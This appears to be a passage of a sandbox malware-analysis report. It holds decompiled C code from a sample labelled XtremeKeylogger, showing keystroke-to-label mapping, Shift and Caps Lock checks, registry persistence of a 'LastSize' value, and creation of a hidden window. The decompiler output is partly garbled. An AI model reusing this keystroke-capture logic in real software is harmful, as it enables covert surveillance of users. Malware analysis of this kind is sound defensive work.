							__edx = L"[Back Tab]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x13:
							__eax = __edi;
							__edx = L"[Copy]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x14:
							__eax = __edi;
							__edx = L"[Finish]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x15:
							__eax = __edi;
							__edx = L"[Reset]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x16:
							__eax = __edi;
							__edx = L"[Play]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x17:
							__eax = __edi;
							__edx = L"[Process]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x18:
							__eax = __edi;
							__edx = 0xc86160;
							__eax = E00C81BB4(__edi, 0xc86160);
							goto L90;
						case 0x19:
							__eax = __edi;
							__edx = L"[Select]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x1a:
							__eax = __edi;
							__edx = L"[Separator]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x1b:
							__eax = __edi;
							__edx = 0xc861a0;
							__eax = E00C81BB4(__edi, 0xc861a0);
							goto L90;
						case 0x1c:
							__eax = __edi;
							__edx = L"[Numpad -]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x1d:
							__eax = __edi;
							__edx = L"[Tab]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x1e:
							__eax = __edi;
							__edx = L"[Zoom]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x1f:
							__eax = __edi;
							__edx = L"[Accept]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x20:
							__eax = __edi;
							__edx = L"[Context Menu]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x21:
							__eax = __edi;
							__edx = L"[Caps Lock]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x22:
							__eax = __edi;
							__edx = L"[Delete]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x23:
							__eax = __edi;
							__edx = L"[Arrow Down]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x24:
							__eax = __edi;
							__edx = L"[End]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x25:
							__eax = __edi;
							__edx = L"[F1]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x26:
							__eax = __edi;
							__edx = L"[F10]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x27:
							__eax = __edi;
							__edx = L"[F11]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x28:
							__eax = __edi;
							__edx = L"[F12]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x29:
							__eax = __edi;
							__edx = L"[F13]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x2a:
							__eax = __edi;
							__edx = L"[F14]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x2b:
							__eax = __edi;
							__edx = L"[F15]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x2c:
							__eax = __edi;
							__edx = L"[F16]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x2d:
							__eax = __edi;
							__edx = L"[F17]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x2e:
							__eax = __edi;
							__edx = L"[F18]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x2f:
							__eax = __edi;
							__edx = L"[F19]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x30:
							__eax = __edi;
							__edx = L"[F2]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x31:
							__eax = __edi;
							__edx = L"[F20]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x32:
							__eax = __edi;
							__edx = L"[F21]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x33:
							__eax = __edi;
							__edx = L"[F22]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x34:
							__eax = __edi;
							__edx = L"[F23]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x35:
							__eax = __edi;
							__edx = L"[F24]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x36:
							__eax = __edi;
							__edx = L"[F3]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x37:
							__eax = __edi;
							__edx = L"[F4]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x38:
							__eax = __edi;
							__edx = L"[F5]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x39:
							__eax = __edi;
							__edx = L"[F6]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x3a:
							__eax = __edi;
							__edx = L"[F7]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x3b:
							__eax = __edi;
							__edx = L"[F8]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x3c:
							__eax = __edi;
							__edx = L"[F9]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x3d:
							__eax = __edi;
							__edx = L"[Help]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x3e:
							__eax = __edi;
							__edx = L"[Home]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x3f:
							__eax = __edi;
							__edx = L"[Insert]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x40:
							__eax = __edi;
							__edx = L"[Mail]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x41:
							__eax = __edi;
							__edx = L"[Media]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x42:
							__eax = __edi;
							__edx = L"[Left Ctrl]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x43:
							__eax = __edi;
							__edx = L"[Arrow Left]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x44:
							__eax = __edi;
							__edx = L"[Left Alt]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x45:
							__eax = __edi;
							__edx = L"[Next Track]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x46:
							__eax = __edi;
							__edx = L"[Play / Pause]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x47:
							__eax = __edi;
							__edx = L"[Previous Track]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x48:
							__eax = __edi;
							__edx = L"[Stop]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x49:
							__eax = __edi;
							__edx = L"[Mode Change]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x4a:
							__eax = __edi;
							__edx = L"[Page Down]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x4b:
							__eax = __edi;
							__edx = L"[Num Lock]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x4c:
							__eax = __edi;
							__edx = L"[Pause]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x4d:
							__eax = __edi;
							__edx = L"[Print]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x4e:
							__eax = __edi;
							__edx = L"[Page Up]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x4f:
							__eax = __edi;
							__edx = L"[Right Ctrl]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x50:
							__eax = __edi;
							__edx = L"[Arrow Right]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x51:
							__eax = __edi;
							__edx = L"[Right Alt]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x52:
							__eax = __edi;
							__edx = L"[Scrol Lock]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x53:
							__eax = __edi;
							__edx = L"[Sleep]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x54:
							__eax = __edi;
							__edx = L"[Print Screen]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x55:
							__eax = __edi;
							__edx = L"[Arrow Up]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x56:
							__eax = __edi;
							__edx = L"[Volume Down]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x57:
							__eax = __edi;
							__edx = L"[Volume Mute]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x58:
							__eax = __edi;
							__edx = L"[Volume Up]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
					}
				}
				L90:
				if(E00C81D04( *_t136) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *_t136) > 0 && E00C81F1C(L"Numpad",  *_t136) <= 0) {
					_t102 = 1;
					E00C81BB4(_t136, L"KeyDelBackspace");
				}
				_v9 = E00C854EC();
				_t145 = ToUnicodeEx(_v6 & 0x0000ffff, _v8 & 0x0000ffff,  &_v265,  &_v788, 0x100, 0, _a8);
				if(_t145 <= 0) {
					__eflags = _t145;
					if(_t145 < 0) {
						 *0xc8deec = _v6 & 0x0000ffff;
						 *0xc8def0 = _v8 & 0x0000ffff;
						memcpy(0xc8def4,  &_v265, 0x40 << 2);
						_t136 = _t136;
						_t147 = _t145;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t147;
						if(_t147 < 0) {
							do {
								_t73 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1),  &_v1044,  &_v788, 0x100, 0, _a8);
								__eflags = _t73;
							} while (_t73 < 0);
						}
					}
				} else {
					memcpy( &_v532, 0xc8deec, 0x42 << 2);
					_t136 = _t136;
					if(E00C81D04( *_t136) == 0) {
						E00C81CD8(_t136, 0x80,  &_v788);
						_t164 = _v9;
						if(_v9 != 0) {
							E00C85148( *_t136, _t102, 0x80,  &_v1052, _t136, 0xc8deec, __eflags);
							E00C81BB4(_t136, _v1052);
						} else {
							E00C850CC( *_t136, _t102, 0x80,  &_v1048, _t136, 0xc8deec, _t164);
							E00C81BB4(_t136, _v1048);
						}
					}
					_t77 = _v532;
					if(_t77 != 0) {
						ToUnicodeEx(_t77, _v528,  &_v524,  &_v788, 0x100, 0, _a8);
					}
					E00C8291C();
				}
				if(_t102 == 1) {
					E00C81B78(_t136);
				}
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(E00C85FC6);
				return E00C81B90( &_v1052, 2);
			}

0x00c85568
0x00c85576
0x00c8557c
0x00c8558f
0x00c85591
0x00c85595
0x00c85599
0x00c8559e
0x00c8559f
0x00c855a4
0x00c855a7
0x00c855ac
0x00c855b1
0x00c855be
0x00c855c7
0x00c855cf
0x00c855db
0x00000000
0x00000000
0x00000000
0x00c85841
0x00000000
0x00000000
0x00c8584b
0x00c8584d
0x00c85852
0x00000000
0x00000000
0x00c8585c
0x00c8585e
0x00c85863
0x00000000
0x00000000
0x00c8586d
0x00c8586f
0x00c85874
0x00000000
0x00000000
0x00c8587e
0x00c85880
0x00c85885
0x00000000
0x00000000
0x00c8588f
0x00c85891
0x00c85896
0x00000000
0x00000000
0x00c858a0
0x00c858a2
0x00c858a7
0x00000000
0x00000000
0x00c858b1
0x00c858b3
0x00c858b8
0x00000000
0x00000000
0x00c858c2
0x00c858c4
0x00c858c9
0x00000000
0x00000000
0x00c858d3
0x00c858d5
0x00c858da
0x00000000
0x00000000
0x00c858e4
0x00c858e6
0x00c858eb
0x00000000
0x00000000
0x00c858f5
0x00c858f7
0x00c858fc
0x00000000
0x00000000
0x00c85906
0x00c85908
0x00c8590d
0x00000000
0x00000000
0x00c85917
0x00c85919
0x00c8591e
0x00000000
0x00000000
0x00c85928
0x00c8592a
0x00c8592f
0x00000000
0x00000000
0x00c85939
0x00c8593b
0x00c85940
0x00000000
0x00000000
0x00c8594a
0x00c8594c
0x00c85951
0x00000000
0x00000000
0x00c8595b
0x00c8595d
0x00c85962
0x00000000
0x00000000
0x00c8596c
0x00c8596e
0x00c85973
0x00000000
0x00000000
0x00c8597d
0x00c8597f
0x00c85984
0x00000000
0x00000000
0x00c8598e
0x00c85990
0x00c85995
0x00000000
0x00000000
0x00c8599f
0x00c859a1
0x00c859a6
0x00000000
0x00000000
0x00c859b0
0x00c859b2
0x00c859b7
0x00000000
0x00000000
0x00c859c1
0x00c859c3
0x00c859c8
0x00000000
0x00000000
0x00c859d2
0x00c859d4
0x00c859d9
0x00000000
0x00000000
0x00c859e3
0x00c859e5
0x00c859ea
0x00000000
0x00000000
0x00c859f4
0x00c859f6
0x00c859fb
0x00000000
0x00000000
0x00c85a05
0x00c85a07
0x00c85a0c
0x00000000
0x00000000
0x00c85a16
0x00c85a18
0x00c85a1d
0x00000000
0x00000000
0x00c85a27
0x00c85a29
0x00c85a2e
0x00000000
0x00000000
0x00c85a38
0x00c85a3a
0x00c85a3f
0x00000000
0x00000000
0x00c85a49
0x00c85a4b
0x00c85a50
0x00000000
0x00000000
0x00c85a5a
0x00c85a5c
0x00c85a61
0x00000000
0x00000000
0x00c85a6b
0x00c85a6d
0x00c85a72
0x00000000
0x00000000
0x00c85a7c
0x00c85a7e
0x00c85a83
0x00000000
0x00000000
0x00c85a8d
0x00c85a8f
0x00c85a94
0x00000000
0x00000000
0x00c85a9e
0x00c85aa0
0x00c85aa5
0x00000000
0x00000000
0x00c85aaf
0x00c85ab1
0x00c85ab6
0x00000000
0x00000000
0x00c85ac0
0x00c85ac2
0x00c85ac7
0x00000000
0x00000000
0x00c85ad1
0x00c85ad3
0x00c85ad8
0x00000000
0x00000000
0x00c85ae2
0x00c85ae4
0x00c85ae9
0x00000000
0x00000000
0x00c85af3
0x00c85af5
0x00c85afa
0x00000000
0x00000000
0x00c85b04
0x00c85b06
0x00c85b0b
0x00000000
0x00000000
0x00c85b15
0x00c85b17
0x00c85b1c
0x00000000
0x00000000
0x00c85b26
0x00c85b28
0x00c85b2d
0x00000000
0x00000000
0x00c85b37
0x00c85b39
0x00c85b3e
0x00000000
0x00000000
0x00c85b48
0x00c85b4a
0x00c85b4f
0x00000000
0x00000000
0x00c85b59
0x00c85b5b
0x00c85b60
0x00000000
0x00000000
0x00c85b6a
0x00c85b6c
0x00c85b71
0x00000000
0x00000000
0x00c85b7b
0x00c85b7d
0x00c85b82
0x00000000
0x00000000
0x00c85b8c
0x00c85b8e
0x00c85b93
0x00000000
0x00000000
0x00c85b9d
0x00c85b9f
0x00c85ba4
0x00000000
0x00000000
0x00c85bae
0x00c85bb0
0x00c85bb5
0x00000000
0x00000000
0x00c85bbf
0x00c85bc1
0x00c85bc6
0x00000000
0x00000000
0x00c85bd0
0x00c85bd2
0x00c85bd7
0x00000000
0x00000000
0x00c85be1
0x00c85be3
0x00c85be8
0x00000000
0x00000000
0x00c85bf2
0x00c85bf4
0x00c85bf9
0x00000000
0x00000000
0x00c85c03
0x00c85c05
0x00c85c0a
0x00000000
0x00000000
0x00c85c14
0x00c85c16
0x00c85c1b
0x00000000
0x00000000
0x00c85c25
0x00c85c27
0x00c85c2c
0x00000000
0x00000000
0x00c85c36
0x00c85c38
0x00c85c3d
0x00000000
0x00000000
0x00c85c47
0x00c85c49
0x00c85c4e
0x00000000
0x00000000
0x00c85c58
0x00c85c5a
0x00c85c5f
0x00000000
0x00000000
0x00c85c69
0x00c85c6b
0x00c85c70
0x00000000
0x00000000
0x00c85c7a
0x00c85c7c
0x00c85c81
0x00000000
0x00000000
0x00c85c8b
0x00c85c8d
0x00c85c92
0x00000000
0x00000000
0x00c85c9c
0x00c85c9e
0x00c85ca3
0x00000000
0x00000000
0x00c85cad
0x00c85caf
0x00c85cb4
0x00000000
0x00000000
0x00c85cbe
0x00c85cc0
0x00c85cc5
0x00000000
0x00000000
0x00c85ccf
0x00c85cd1
0x00c85cd6
0x00000000
0x00000000
0x00c85ce0
0x00c85ce2
0x00c85ce7
0x00000000
0x00000000
0x00c85cf1
0x00c85cf3
0x00c85cf8
0x00000000
0x00000000
0x00c85d02
0x00c85d04
0x00c85d09
0x00000000
0x00000000
0x00c85d13
0x00c85d15
0x00c85d1a
0x00000000
0x00000000
0x00c85d24
0x00c85d26
0x00c85d2b
0x00000000
0x00000000
0x00c85d35
0x00c85d37
0x00c85d3c
0x00000000
0x00000000
0x00c85d46
0x00c85d48
0x00c85d4d
0x00000000
0x00000000
0x00c85d57
0x00c85d59
0x00c85d5e
0x00000000
0x00000000
0x00c85d68
0x00c85d6a
0x00c85d6f
0x00000000
0x00000000
0x00c85d76
0x00c85d78
0x00c85d7d
0x00000000
0x00000000
0x00c85d84
0x00c85d86
0x00c85d8b
0x00000000
0x00000000
0x00c85d92
0x00c85d94
0x00c85d99
0x00000000
0x00000000
0x00c85da0
0x00c85da2
0x00c85da7
0x00000000
0x00000000
0x00c85dae
0x00c85db0
0x00c85db5
0x00000000
0x00000000
0x00c85dbc
0x00c85dbe
0x00c85dc3
0x00000000
0x00000000
0x00c85dca
0x00c85dcc
0x00c85dd1
0x00000000
0x00000000
0x00c85dd8
0x00c85dda
0x00c85ddf
0x00000000
0x00000000
0x00c85de6
0x00c85de8
0x00c85ded
0x00000000
0x00000000
0x00c855db
0x00c85df2
0x00c85dfb
0x00c85e26
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81B78: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C854D4, Relevance: 12.1, APIs: 8, Instructions: 54
keyboard

C-Code - Quality: 89%

			E00C854D4(intOrPtr* __eax, intOrPtr* __ecx, void* __edx) {
				void* _t13;
				void* _t14;
				intOrPtr _t20;

				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__ecx =  *__ecx + __eax;
				_t20 =  *__ecx;
				if (_t20 >= 0) goto L1;
				if (_t20 == 0) goto L2;
				_push(_t13);
				 *__ecx =  *__ecx + __ecx;
				if ( *__ecx != 0) goto L3;
				 *[gs:eax] =  *[gs:eax] + __eax;
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(_t13 - 0x4d)) =  *((intOrPtr*)(_t13 - 0x4d)) + __edx;
				_push(_t13);
				_t14 = 1;
				if(GetKeyState(0x14) != 1 || GetKeyState(0x10) >= 0) {
					if(GetKeyState(0x14) != 1 || GetKeyState(0x10) < 0) {
						if(GetKeyState(0x14) == 1 || GetKeyState(0x10) >= 0) {
							if(GetKeyState(0x14) != 1 && GetKeyState(0x10) >= 0) {
								_t14 = 1;
							}
						} else {
							_t14 = 0;
						}
					} else {
						_t14 = 0;
					}
				} else {
					_t14 = 1;
				}
				return _t14;
			}

0x00c854d4
0x00c854d6
0x00c854d9
0x00c854d9
0x00c854dc
0x00c854de
0x00c854e0
0x00c854e1
0x00c854e4
0x00c854e6
0x00c854e9
0x00c854eb
0x00c854ec
0x00c854ed
0x00c854fa
0x00c85517
0x00c85534
0x00c85551
0x00c8555f
0x00c8555f
0x00c85542
0x00c85542
0x00c85542
0x00c85525
0x00c85525
0x00c85525
0x00c85508
0x00c85508
0x00c85508
0x00c85564

APIs

GetKeyState.USER32(00000014), ref: 00C854F1
GetKeyState.USER32(00000010), ref: 00C854FE
GetKeyState.USER32(00000014), ref: 00C8550E
GetKeyState.USER32(00000010), ref: 00C8551B
GetKeyState.USER32(00000014), ref: 00C8552B
GetKeyState.USER32(00000010), ref: 00C85538
GetKeyState.USER32(00000014), ref: 00C85548
GetKeyState.USER32(00000010), ref: 00C85555

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C853EC, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 65
registry

C-Code - Quality: 50%

			E00C853EC(char __eax, void* __ebx, void* __esi) {
				void* _v8;
				char _v12;
				int* _v16;
				char _v20;
				intOrPtr _t39;
				char _t43;
				void* _t46;

				_v20 = 0;
				_v16 = 0;
				_t43 = __eax;
				_push(_t46);
				_push(0xc854aa);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff0;
				_push(L"SOFTWARE\\");
				E00C81CD8( &_v20, 0xb, 0xc8d9bc);
				_push(_v20);
				_push(E00C854D4);
				E00C81D74();
				if(RegCreateKeyExW(0x80000001, E00C81CF4(_v16), 0, 0, 0, 0x20006, 0,  &_v8, 0) == 0) {
					_v12 = _t43;
					RegSetValueExW(_v8, L"LastSize", 0, 4,  &_v12, 4);
					RegCloseKey(_v8);
				}
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(E00C854B1);
				return E00C81B90( &_v20, 2);
			}

0x00c853f6
0x00c853f9
0x00c853fc
0x00c85400
0x00c85401
0x00c85406
0x00c85409
0x00c8540e
0x00c85420
0x00c85425
0x00c85428
0x00c85435
0x00c85461
0x00c8546d
0x00c85481
0x00c8548a
0x00c8548a
0x00c85491
0x00c85494
0x00c85497
0x00c854a9

APIs

Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4,?,SOFTWARE\,00000000,00C854AA,?,?), ref: 00C8545A
RegSetValueExW.ADVAPI32(?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4), ref: 00C85481
RegCloseKey.ADVAPI32(?,?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00C8548A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

XtremeKeylogger, xrefs: 00C853F2
LastSize, xrefs: 00C85478
SOFTWARE\, xrefs: 00C8540E

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C852E8, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63
registry

C-Code - Quality: 50%

			E00C852E8(void* __ebx) {
				void* _v8;
				char _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				intOrPtr _t44;
				void* _t48;

				_v28 = 0;
				_v24 = 0;
				_push(_t48);
				_push(0xc853aa);
				_push( *[fs:eax]);
				 *[fs:eax] = _t48 + 0xffffffe8;
				_push(L"SOFTWARE\\");
				E00C81CD8( &_v28, 0xb, 0xc8d9bc);
				_push(_v28);
				_push(0xc853d4);
				E00C81D74();
				if(RegOpenKeyExW(0x80000001, E00C81CF4(_v24), 0, 0x20019,  &_v8) == 0) {
					_v20 = 4;
					_v16 = 4;
					if(RegQueryValueExW(_v8, L"LastSize", 0,  &_v20,  &_v12,  &_v16) == 0) {
					}
					RegCloseKey(_v8);
				}
				_pop(_t44);
				 *[fs:eax] = _t44;
				_push(E00C853B1);
				return E00C81B90( &_v28, 2);
			}

0x00c852f1
0x00c852f4
0x00c852f9
0x00c852fa
0x00c852ff
0x00c85302
0x00c85307
0x00c85319
0x00c8531e
0x00c85321
0x00c8532e
0x00c85353
0x00c85355
0x00c8535c
0x00c85381
0x00c85381
0x00c8538a
0x00c8538a
0x00c85391
0x00c85394
0x00c85397
0x00c853a9

APIs

Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000,00C853AA,?,XtremeKeylogger), ref: 00C8534C
RegQueryValueExW.ADVAPI32(?,LastSize,00000000,?,?,?,80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000,00C853AA), ref: 00C8537A
RegCloseKey.ADVAPI32(?,?,LastSize,00000000,?,?,?,80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000), ref: 00C8538A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

XtremeKeylogger, xrefs: 00C852EE
SOFTWARE\, xrefs: 00C85307
LastSize, xrefs: 00C85371

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C87348, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58
registry

C-Code - Quality: 100%

			E00C87348(WCHAR* __eax, intOrPtr __edx) {
				char _v52;
				int _v56;
				int _v60;
				WCHAR* _t14;
				struct HINSTANCE__* _t17;
				WNDCLASSW* _t33;
				WCHAR* _t34;
				struct tagRECT* _t35;

				_t14 = __eax;
				_t35 =  &_v56;
				_t33 =  &_v52;
				_t33->style = 0;
				if(__edx != 0) {
					 *((intOrPtr*)(_t33 + 4)) = __edx;
				} else {
					 *((intOrPtr*)(_t33 + 4)) = E00C8732C;
				}
				_t33->cbClsExtra = 0;
				_t33->cbWndExtra = 0;
				_t33->hInstance = 0;
				_t33->hIcon = 0;
				_t33->hCursor = 0;
				_t33->hbrBackground = 0;
				_t33->lpszMenuName = 0;
				_t34 = _t14;
				_t33->lpszClassName = _t34;
				GetWindowRect(GetDesktopWindow(), _t35);
				_t17 = GetModuleHandleA(0);
				RegisterClassW(_t33);
				return CreateWindowExW(0x80, _t34, E00C873DC, 0x98000000, _v60, _v56, 0, 0, 0, 0, _t17, 0);
			}

0x00c87348
0x00c8734b
0x00c8734e
0x00c87354
0x00c87358
0x00c87364
0x00c8735a
0x00c8735f
0x00c8735f
0x00c87369
0x00c8736e
0x00c87373
